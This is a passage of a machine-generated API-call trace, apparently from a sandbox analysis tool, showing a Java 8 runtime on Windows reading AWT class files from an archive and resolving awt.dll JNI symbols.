lpNumberOfBytesRead=0x208bc10*=0xa0, lpOverlapped=0x0) returned 1 [0130.255] malloc (_Size=0x18) returned 0x12f4ef20 [0130.255] strlen (_Str="java/awt/AWTEvent.class") returned 0x17 [0130.255] strcpy (in: _Dest=0x208bdc0, _Source="java/awt/AWTEvent.class" | out: _Dest="java/awt/AWTEvent.class") returned="java/awt/AWTEvent.class" [0130.255] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30185ea, lpNewFilePointer=0x208b840, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b840*=50431466) returned 1 [0130.255] ReadFile (in: hFile=0x134, lpBuffer=0x208b890, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b810, lpOverlapped=0x0 | out: lpBuffer=0x208b890*, lpNumberOfBytesRead=0x208b810*=0x1e, lpOverlapped=0x0) returned 1 [0130.257] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301861f, lpNewFilePointer=0x208b8a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8a0*=50431519) returned 1 [0130.257] ReadFile (in: hFile=0x134, lpBuffer=0x12e4cb80, nNumberOfBytesToRead=0x1dd5, lpNumberOfBytesRead=0x208b870, lpOverlapped=0x0 | out: lpBuffer=0x12e4cb80*, lpNumberOfBytesRead=0x208b870*=0x1dd5, lpOverlapped=0x0) returned 1 [0130.258] free (_Block=0x12dda860) [0130.258] free (_Block=0x12e5ed90) [0130.264] strlen (_Str="java/util/EventObject.class") returned 0x1b [0130.264] malloc (_Size=0x48) returned 0x12e5fc40 [0130.264] malloc (_Size=0xa0) returned 0x12dabe10 [0130.264] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414116, lpNewFilePointer=0x208b200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b200*=54608150) returned 1 [0130.264] ReadFile (in: hFile=0x134, lpBuffer=0x12dabe10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b1d0, lpOverlapped=0x0 | out: lpBuffer=0x12dabe10*, lpNumberOfBytesRead=0x208b1d0*=0xa0, lpOverlapped=0x0) returned 1 [0130.264] malloc (_Size=0x1c) returned 0x12dda860 [0130.265] strlen (_Str="java/util/EventObject.class") returned 0x1b [0130.265] strcpy (in: _Dest=0x208b380, _Source="java/util/EventObject.class" | out: _Dest="java/util/EventObject.class") returned="java/util/EventObject.class" [0130.265] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301823c, lpNewFilePointer=0x208ae00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ae00*=50430524) returned 1 [0130.265] ReadFile (in: hFile=0x134, lpBuffer=0x208ae50, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208add0, lpOverlapped=0x0 | out: lpBuffer=0x208ae50*, lpNumberOfBytesRead=0x208add0*=0x1e, lpOverlapped=0x0) returned 1 [0130.266] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3018275, lpNewFilePointer=0x208ae60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ae60*=50430581) returned 1 [0130.266] ReadFile (in: hFile=0x134, lpBuffer=0x12e4eaf0, nNumberOfBytesToRead=0x375, lpNumberOfBytesRead=0x208ae30, lpOverlapped=0x0 | out: lpBuffer=0x12e4eaf0*, lpNumberOfBytesRead=0x208ae30*=0x375, lpOverlapped=0x0) returned 1 [0130.266] free (_Block=0x12f4ef20) [0130.266] free (_Block=0x12e5f920) [0130.313] malloc (_Size=0x48) returned 0x12e5f600 [0130.313] malloc (_Size=0xa0) returned 0x12dac4f0 [0130.313] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34140cf, lpNewFilePointer=0x208c070, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c070*=54608079) returned 1 [0130.313] ReadFile (in: hFile=0x134, lpBuffer=0x12dac4f0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c040, lpOverlapped=0x0 | out: lpBuffer=0x12dac4f0*, lpNumberOfBytesRead=0x208c040*=0xa0, lpOverlapped=0x0) returned 1 [0130.314] malloc (_Size=0x1a) returned 0x12dda8f0 [0130.314] strlen (_Str="java/awt/AWTEvent$1.class") returned 0x19 [0130.314] strcpy (in: _Dest=0x208c1f0, _Source="java/awt/AWTEvent$1.class" | out: _Dest="java/awt/AWTEvent$1.class") returned="java/awt/AWTEvent$1.class" [0130.314] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3017e28, lpNewFilePointer=0x208bc70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc70*=50429480) returned 1 [0130.314] ReadFile (in: hFile=0x134, lpBuffer=0x208bcc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bc40, lpOverlapped=0x0 | out: lpBuffer=0x208bcc0*, lpNumberOfBytesRead=0x208bc40*=0x1e, lpOverlapped=0x0) returned 1 [0130.316] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3017e5f, lpNewFilePointer=0x208bcd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bcd0*=50429535) returned 1 [0130.316] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b020, nNumberOfBytesToRead=0x3dd, lpNumberOfBytesRead=0x208bca0, lpOverlapped=0x0 | out: lpBuffer=0x12e4b020*, lpNumberOfBytesRead=0x208bca0*=0x3dd, lpOverlapped=0x0) returned 1 [0130.316] free (_Block=0x12dda860) [0130.316] free (_Block=0x12e5fc40) [0130.317] strlen (_Str="sun/awt/AWTAccessor$AWTEventAccessor.class") returned 0x2a [0130.317] malloc (_Size=0x48) returned 0x12e5f920 [0130.317] malloc (_Size=0xa0) returned 0x12daace0 [0130.318] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414077, lpNewFilePointer=0x208b5b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b5b0*=54607991) returned 1 [0130.318] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b580, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208b580*=0xa0, lpOverlapped=0x0) returned 1 [0130.318] malloc (_Size=0x2b) returned 0x12ed5bb0 [0130.319] strlen (_Str="sun/awt/AWTAccessor$AWTEventAccessor.class") returned 0x2a [0130.319] strcpy (in: _Dest=0x208b730, _Source="sun/awt/AWTAccessor$AWTEventAccessor.class" | out: _Dest="sun/awt/AWTAccessor$AWTEventAccessor.class") returned="sun/awt/AWTAccessor$AWTEventAccessor.class" [0130.319] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3017c05, lpNewFilePointer=0x208b1b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b1b0*=50428933) returned 1 [0130.319] ReadFile (in: hFile=0x134, lpBuffer=0x208b200, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b180, lpOverlapped=0x0 | out: lpBuffer=0x208b200*, lpNumberOfBytesRead=0x208b180*=0x1e, lpOverlapped=0x0) returned 1 [0130.320] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3017c4d, lpNewFilePointer=0x208b210, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b210*=50429005) returned 1 [0130.320] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b5c0, nNumberOfBytesToRead=0x1db, lpNumberOfBytesRead=0x208b1e0, lpOverlapped=0x0 | out: lpBuffer=0x12e4b5c0*, lpNumberOfBytesRead=0x208b1e0*=0x1db, lpOverlapped=0x0) returned 1 [0130.320] free (_Block=0x12dda8f0) [0130.321] free (_Block=0x12e5f600) [0130.322] malloc (_Size=0x48) returned 0x12e5f3d0 [0130.322] malloc (_Size=0xa0) returned 0x12dab890 [0130.322] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3414025, lpNewFilePointer=0x208c0c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0c0*=54607909) returned 1 [0130.322] ReadFile (in: hFile=0x134, lpBuffer=0x12dab890, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c090, lpOverlapped=0x0 | out: lpBuffer=0x12dab890*, lpNumberOfBytesRead=0x208c090*=0xa0, lpOverlapped=0x0) returned 1 [0130.323] malloc (_Size=0x25) returned 0x12ddaf50 [0130.323] strlen (_Str="java/awt/event/NativeLibLoader.class") returned 0x24 [0130.323] strcpy (in: _Dest=0x208c240, _Source="java/awt/event/NativeLibLoader.class" | out: _Dest="java/awt/event/NativeLibLoader.class") returned="java/awt/event/NativeLibLoader.class" [0130.323] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3017a3e, lpNewFilePointer=0x208bcc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bcc0*=50428478) returned 1 [0130.323] ReadFile (in: hFile=0x134, lpBuffer=0x208bd10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bc90, lpOverlapped=0x0 | out: lpBuffer=0x208bd10*, lpNumberOfBytesRead=0x208bc90*=0x1e, lpOverlapped=0x0) returned 1 [0130.324] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3017a80, lpNewFilePointer=0x208bd20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd20*=50428544) returned 1 [0130.324] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x185, lpNumberOfBytesRead=0x208bcf0, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208bcf0*=0x185, lpOverlapped=0x0) returned 1 [0130.325] free (_Block=0x12ed5bb0) [0130.325] free (_Block=0x12e5f920) [0130.326] malloc (_Size=0x48) returned 0x12e5f880 [0130.326] malloc (_Size=0xa0) returned 0x12dabe10 [0130.326] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413fd1, lpNewFilePointer=0x208c320, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c320*=54607825) returned 1 [0130.326] ReadFile (in: hFile=0x134, lpBuffer=0x12dabe10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c2f0, lpOverlapped=0x0 | out: lpBuffer=0x12dabe10*, lpNumberOfBytesRead=0x208c2f0*=0xa0, lpOverlapped=0x0) returned 1 [0130.327] malloc (_Size=0x27) returned 0x12ddadd0 [0130.328] strlen (_Str="java/awt/event/NativeLibLoader$1.class") returned 0x26 [0130.328] strcpy (in: _Dest=0x208c4a0, _Source="java/awt/event/NativeLibLoader$1.class" | out: _Dest="java/awt/event/NativeLibLoader$1.class") returned="java/awt/event/NativeLibLoader$1.class" [0130.328] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30177a7, lpNewFilePointer=0x208bf20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf20*=50427815) returned 1 [0130.328] ReadFile (in: hFile=0x134, lpBuffer=0x208bf70, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bef0, lpOverlapped=0x0 | out: lpBuffer=0x208bf70*, lpNumberOfBytesRead=0x208bef0*=0x1e, lpOverlapped=0x0) returned 1 [0130.329] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30177eb, lpNewFilePointer=0x208bf80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf80*=50427883) returned 1 [0130.329] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b020, nNumberOfBytesToRead=0x253, lpNumberOfBytesRead=0x208bf50, lpOverlapped=0x0 | out: lpBuffer=0x12e4b020*, lpNumberOfBytesRead=0x208bf50*=0x253, lpOverlapped=0x0) returned 1 [0130.329] free (_Block=0x12ddaf50) [0130.330] free (_Block=0x12e5f3d0) [0130.331] strlen (_Str="") returned 0x0 [0130.331] strlen (_Str=".dll") returned 0x4 [0130.332] strlen (_Str="") returned 0x0 [0130.332] strlen (_Str=".dll") returned 0x4 [0130.332] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff7d5e70000 [0130.332] malloc (_Size=0x8) returned 0x1322f3e0 [0130.332] strlen (_Str="awt.dll") returned 0x7 [0130.332] malloc (_Size=0x8) returned 0x1322f320 [0130.332] strcpy (in: _Dest=0x1322f320, _Source="awt.dll" | out: _Dest="awt.dll") returned="awt.dll" [0130.332] free (_Block=0x1322f3e0) [0130.332] strlen (_Str="awt.dll") returned 0x7 [0130.332] strlen (_Str="awt") returned 0x3 [0130.332] strlen (_Str="_JNI_OnLoad@8") returned 0xd [0130.332] malloc (_Size=0x12) returned 0x12f4ea80 [0130.332] strncpy (in: _Dest=0x12f4ea80, _Source="_JNI_OnLoad@8", _Count=0xb | out: _Dest="_JNI_OnLoadength\x01") returned="_JNI_OnLoadength\x01" [0130.332] strcat (in: _Dest=0x12f4ea80, _Source="_" | out: _Dest="_JNI_OnLoad_") returned="_JNI_OnLoad_" [0130.332] strcat (in: _Dest=0x12f4ea80, _Source="awt" | out: _Dest="_JNI_OnLoad_awt") returned="_JNI_OnLoad_awt" [0130.332] strcat (in: _Dest=0x12f4ea80, _Source="@8" | out: _Dest="_JNI_OnLoad_awt@8") returned="_JNI_OnLoad_awt@8" [0130.332] free (_Block=0x12f4ea80) [0130.332] strlen (_Str="awt") returned 0x3 [0130.332] strlen (_Str="JNI_OnLoad") returned 0xa [0130.332] malloc (_Size=0xf) returned 0x12f4ef60 [0130.333] strcpy (in: _Dest=0x12f4ef60, _Source="JNI_OnLoad" | out: _Dest="JNI_OnLoad") returned="JNI_OnLoad" [0130.333] strcat (in: _Dest=0x12f4ef60, _Source="_" | out: _Dest="JNI_OnLoad_") returned="JNI_OnLoad_" [0130.333] strcat (in: _Dest=0x12f4ef60, _Source="awt" | out: _Dest="JNI_OnLoad_awt") returned="JNI_OnLoad_awt" [0130.333] free (_Block=0x12f4ef60) [0130.333] free (_Block=0x1322f320) [0130.333] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll") returned 0x2e [0130.333] malloc (_Size=0x68) returned 0x12ec3700 [0130.333] wcscpy (in: _Dest=0x12ec3700, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll") returned="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll" [0130.333] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll", nBufferLength=0x9, lpBuffer=0x208b7f8, lpFilePart=0x208b7f0 | out: lpBuffer="", lpFilePart=0x208b7f0*=0x0) returned 0x2f [0130.333] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_171\\bin\\awt.dll"), fInfoLevelId=0x0, lpFileInformation=0x208b590 | out: lpFileInformation=0x208b590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb165611, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb165611, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb165611, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1725c8)) returned 1 [0130.333] free (_Block=0x12ec3700) [0130.336] strlen (_Str="java/awt/event/InputEvent$1.class") returned 0x21 [0130.336] malloc (_Size=0x48) returned 0x12e5efc0 [0130.336] malloc (_Size=0xa0) returned 0x12dab520 [0130.336] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413f82, lpNewFilePointer=0x208c370, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c370*=54607746) returned 1 [0130.336] ReadFile (in: hFile=0x134, lpBuffer=0x12dab520, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c340, lpOverlapped=0x0 | out: lpBuffer=0x12dab520*, lpNumberOfBytesRead=0x208c340*=0xa0, lpOverlapped=0x0) returned 1 [0130.337] malloc (_Size=0x22) returned 0x12ddab00 [0130.337] strlen (_Str="java/awt/event/InputEvent$1.class") returned 0x21 [0130.337] strcpy (in: _Dest=0x208c4f0, _Source="java/awt/event/InputEvent$1.class" | out: _Dest="java/awt/event/InputEvent$1.class") returned="java/awt/event/InputEvent$1.class" [0130.337] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30175cb, lpNewFilePointer=0x208bf70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf70*=50427339) returned 1 [0130.337] ReadFile (in: hFile=0x134, lpBuffer=0x208bfc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bf40, lpOverlapped=0x0 | out: lpBuffer=0x208bfc0*, lpNumberOfBytesRead=0x208bf40*=0x1e, lpOverlapped=0x0) returned 1 [0130.338] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301760a, lpNewFilePointer=0x208bfd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bfd0*=50427402) returned 1 [0130.338] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x19d, lpNumberOfBytesRead=0x208bfa0, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208bfa0*=0x19d, lpOverlapped=0x0) returned 1 [0130.338] free (_Block=0x12ddadd0) [0130.339] free (_Block=0x12e5f880) [0130.340] strlen (_Str="sun/awt/AWTAccessor$InputEventAccessor.class") returned 0x2c [0130.340] malloc (_Size=0x48) returned 0x12e5fba0 [0130.340] malloc (_Size=0xa0) returned 0x12daaef0 [0130.340] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413f28, lpNewFilePointer=0x208b8b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8b0*=54607656) returned 1 [0130.340] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b880, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208b880*=0xa0, lpOverlapped=0x0) returned 1 [0130.341] malloc (_Size=0x2d) returned 0x12ed5bb0 [0130.341] strlen (_Str="sun/awt/AWTAccessor$InputEventAccessor.class") returned 0x2c [0130.341] strcpy (in: _Dest=0x208ba30, _Source="sun/awt/AWTAccessor$InputEventAccessor.class" | out: _Dest="sun/awt/AWTAccessor$InputEventAccessor.class") returned="sun/awt/AWTAccessor$InputEventAccessor.class" [0130.341] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30174b6, lpNewFilePointer=0x208b4b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4b0*=50427062) returned 1 [0130.341] ReadFile (in: hFile=0x134, lpBuffer=0x208b500, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b480, lpOverlapped=0x0 | out: lpBuffer=0x208b500*, lpNumberOfBytesRead=0x208b480*=0x1e, lpOverlapped=0x0) returned 1 [0130.342] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3017500, lpNewFilePointer=0x208b510, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b510*=50427136) returned 1 [0130.342] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b180, nNumberOfBytesToRead=0xcb, lpNumberOfBytesRead=0x208b4e0, lpOverlapped=0x0 | out: lpBuffer=0x12e4b180*, lpNumberOfBytesRead=0x208b4e0*=0xcb, lpOverlapped=0x0) returned 1 [0130.343] free (_Block=0x12ddab00) [0130.343] free (_Block=0x12e5efc0) [0130.382] malloc (_Size=0x50) returned 0x12d5acd0 [0130.383] strlen (_Str="sun/awt/windows/WComponentPeer.class") returned 0x24 [0130.383] malloc (_Size=0x48) returned 0x12e5ed90 [0130.383] malloc (_Size=0xa0) returned 0x12dab260 [0130.383] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413ed6, lpNewFilePointer=0x208d0c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d0c0*=54607574) returned 1 [0130.383] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d090, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208d090*=0xa0, lpOverlapped=0x0) returned 1 [0130.384] malloc (_Size=0x25) returned 0x12dda9e0 [0130.385] strlen (_Str="sun/awt/windows/WComponentPeer.class") returned 0x24 [0130.385] strcpy (in: _Dest=0x208d240, _Source="sun/awt/windows/WComponentPeer.class" | out: _Dest="sun/awt/windows/WComponentPeer.class") returned="sun/awt/windows/WComponentPeer.class" [0130.385] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3012c08, lpNewFilePointer=0x208ccc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccc0*=50408456) returned 1 [0130.385] ReadFile (in: hFile=0x134, lpBuffer=0x208cd10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc90, lpOverlapped=0x0 | out: lpBuffer=0x208cd10*, lpNumberOfBytesRead=0x208cc90*=0x1e, lpOverlapped=0x0) returned 1 [0130.386] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3012c4a, lpNewFilePointer=0x208cd20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd20*=50408522) returned 1 [0130.386] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b020, nNumberOfBytesToRead=0x486c, lpNumberOfBytesRead=0x208ccf0, lpOverlapped=0x0 | out: lpBuffer=0x12e4b020*, lpNumberOfBytesRead=0x208ccf0*=0x486c, lpOverlapped=0x0) returned 1 [0130.388] free (_Block=0x12ed5bb0) [0130.388] free (_Block=0x12e5fba0) [0130.391] strlen (_Str="java/awt/peer/ComponentPeer.class") returned 0x21 [0130.391] malloc (_Size=0x48) returned 0x12e5f2e0 [0130.391] malloc (_Size=0xa0) returned 0x12daace0 [0130.391] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413e87, lpNewFilePointer=0x208c600, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c600*=54607495) returned 1 [0130.391] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c5d0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208c5d0*=0xa0, lpOverlapped=0x0) returned 1 [0130.392] malloc (_Size=0x22) returned 0x12ddb0a0 [0130.393] strlen (_Str="java/awt/peer/ComponentPeer.class") returned 0x21 [0130.393] strcpy (in: _Dest=0x208c780, _Source="java/awt/peer/ComponentPeer.class" | out: _Dest="java/awt/peer/ComponentPeer.class") returned="java/awt/peer/ComponentPeer.class" [0130.393] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3012277, lpNewFilePointer=0x208c200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c200*=50406007) returned 1 [0130.393] ReadFile (in: hFile=0x134, lpBuffer=0x208c250, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c1d0, lpOverlapped=0x0 | out: lpBuffer=0x208c250*, lpNumberOfBytesRead=0x208c1d0*=0x1e, lpOverlapped=0x0) returned 1 [0130.395] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30122b6, lpNewFilePointer=0x208c260, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c260*=50406070) returned 1 [0130.395] ReadFile (in: hFile=0x134, lpBuffer=0x12e4fa30, nNumberOfBytesToRead=0x952, lpNumberOfBytesRead=0x208c230, lpOverlapped=0x0 | out: lpBuffer=0x12e4fa30*, lpNumberOfBytesRead=0x208c230*=0x952, lpOverlapped=0x0) returned 1 [0130.395] free (_Block=0x12dda9e0) [0130.395] free (_Block=0x12e5ed90) [0130.403] strlen (_Str="java/awt/dnd/peer/DropTargetPeer.class") returned 0x26 [0130.404] malloc (_Size=0x48) returned 0x12e5fdd0 [0130.404] malloc (_Size=0xa0) returned 0x12dab890 [0130.404] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413e33, lpNewFilePointer=0x208c600, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c600*=54607411) returned 1 [0130.404] ReadFile (in: hFile=0x134, lpBuffer=0x12dab890, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c5d0, lpOverlapped=0x0 | out: lpBuffer=0x12dab890*, lpNumberOfBytesRead=0x208c5d0*=0xa0, lpOverlapped=0x0) returned 1 [0130.404] malloc (_Size=0x27) returned 0x12dda9e0 [0130.405] strlen (_Str="java/awt/dnd/peer/DropTargetPeer.class") returned 0x26 [0130.405] strcpy (in: _Dest=0x208c780, _Source="java/awt/dnd/peer/DropTargetPeer.class" | out: _Dest="java/awt/dnd/peer/DropTargetPeer.class") returned="java/awt/dnd/peer/DropTargetPeer.class" [0130.405] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x301218d, lpNewFilePointer=0x208c200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c200*=50405773) returned 1 [0130.405] ReadFile (in: hFile=0x134, lpBuffer=0x208c250, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c1d0, lpOverlapped=0x0 | out: lpBuffer=0x208c250*, lpNumberOfBytesRead=0x208c1d0*=0x1e, lpOverlapped=0x0) returned 1 [0130.406] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30121d1, lpNewFilePointer=0x208c260, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c260*=50405841) returned 1 [0130.406] ReadFile (in: hFile=0x134, lpBuffer=0x12e4fa50, nNumberOfBytesToRead=0xa6, lpNumberOfBytesRead=0x208c230, lpOverlapped=0x0 | out: lpBuffer=0x12e4fa50*, lpNumberOfBytesRead=0x208c230*=0xa6, lpOverlapped=0x0) returned 1 [0130.407] free (_Block=0x12ddb0a0) [0130.407] free (_Block=0x12e5f2e0) [0130.413] malloc (_Size=0x48) returned 0x12e5f790 [0130.413] malloc (_Size=0xa0) returned 0x12daaef0 [0130.413] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413de4, lpNewFilePointer=0x208c680, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c680*=54607332) returned 1 [0130.413] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c650, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208c650*=0xa0, lpOverlapped=0x0) returned 1 [0130.414] malloc (_Size=0x22) returned 0x12ddac50 [0130.415] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3011965, lpNewFilePointer=0x208c280, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c280*=50403685) returned 1 [0130.415] ReadFile (in: hFile=0x134, lpBuffer=0x208c2d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c250, lpOverlapped=0x0 | out: lpBuffer=0x208c2d0*, lpNumberOfBytesRead=0x208c250*=0x1e, lpOverlapped=0x0) returned 1 [0130.416] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x30119a4, lpNewFilePointer=0x208c2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2e0*=50403748) returned 1 [0130.417] ReadFile (in: hFile=0x134, lpBuffer=0x12e4fa30, nNumberOfBytesToRead=0x7e9, lpNumberOfBytesRead=0x208c2b0, lpOverlapped=0x0 | out: lpBuffer=0x12e4fa30*, lpNumberOfBytesRead=0x208c2b0*=0x7e9, lpOverlapped=0x0) returned 1 [0130.422] malloc (_Size=0x48) returned 0x12e5f830 [0130.422] malloc (_Size=0xa0) returned 0x12dac860 [0130.422] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3413da3, lpNewFilePointer=0x208c370, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c370*=54607267) returned 1 [0130.422] ReadFile (in: hFile=0x134, lpBuffer=0x12dac860, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c340, lpOverlapped=0x0 | out: lpBuffer=0x12dac860*, lpNumberOfBytesRead=0x208c340*=0xa0, lpOverlapped=0x0) returned 1 [0130.423] malloc (_Size=0x14) returned 0x12f4ea20 [0130.423] strlen (_Str="java/awt/Font.class") returned 0x13 [0130.423] strcpy (in: _Dest=0x208c4f0, _Source="java/awt/Font.class" | out: _Dest="java/awt/Font.class") returned="java/awt/Font.class" [0130.423] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x300b813, lpNewFilePointer=0x208bf70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf70*=50378771) returned 1 [0130.423] ReadFile (in: hFile=0x134, lpBuffer=0x208bfc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bf40, lpOverlapped=0x0 | out: lpBuffer=0x208bfc0*, lpNumberOfBytesRead=0x208bf40*=0x1e, lpOverlapped=0x0) returned 1 [0130.427] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x300b844, lpNewFilePointer=0x208bfd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bfd0*=50378820) returned 1 [0130.427] ReadFile (in: hFile=0x134, lpBuffer=0x12e4b020, nNumberOfBytesToRead=0x6121, lpNumberOfBytesRead=0x208bfa0, lpOverlapped=0x0 | out: lpBuffer=0x12e4b020*, lpNumberOfBytesRead=0x208bfa0*=0x6121, lpOverlapped=0x0) returned 1 [0130.429] free (_Block=0x12ddac50) [0130.429] free (_Block=0x12e5f790) [0130.432] strlen (_Str="java/awt/Font$FontAccessImpl.class") returned 0x22 [0130.433] malloc (_Size=0x48) returned 0x12e5fd80 [0130.433] malloc (_Size=0xa0) returned 0x12dabd60 [0130.433] SetFilePointerEx (in: hFile=0x134, 